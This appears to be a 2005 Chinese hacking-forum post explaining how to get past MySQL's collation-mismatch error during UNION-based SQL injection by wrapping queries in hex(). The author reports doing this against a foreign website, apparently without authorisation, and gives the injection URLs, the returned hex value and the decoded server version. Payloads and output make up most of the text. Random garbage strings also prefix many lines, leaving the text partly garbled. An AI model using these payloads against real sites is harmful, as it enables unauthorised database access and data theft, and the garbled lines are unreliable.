MySQL注射时ErrorNo.1267的突破

admin

本文作者：SuperHei
文章性质：原创
; C! Q  X8 t& A8 [, f) m0 l1 ^发布日期：2005-10-18
$ ]; b  Y8 k% a测试个国外的站时：
5 _9 e: N. \& N4 Xurl：?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*
9 O  J/ o# ~8 K* n8 b. V3 I/ ]8 P返回错误：
6 S6 F& `5 }3 TIllegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
MySQL Error No. 126
& v; ^( ^' N  u$ ]8 }看来是union查询前后字符集（http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html）不同出现的。
% `/ B) W) D2 i; }. k解决办法：转为其他编码如hex。
url：?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*
成功得到hex(version())的值为：
342E312E332D62657461
9 r0 j% z& S( b) g; m回Mysql查询下得到：
6 {7 Z* f/ n" ]3 U: Bmysql> select 0x342E312E332D62657461;
- R. P8 G9 P  T8 h+------------------------+
4 {" R$ }) w# V' m/ J| 0x342E312E332D62657461 |
* H) e& v$ }' Z& t+------------------------+
0 X4 u$ `' c# d| 4.1.3-beta |
+------------------------+
5 S9 O1 `* i5 {% m( x) T; A1 row in set (0.00 sec)

( h& A- ^8 o; ?! V# n, b& V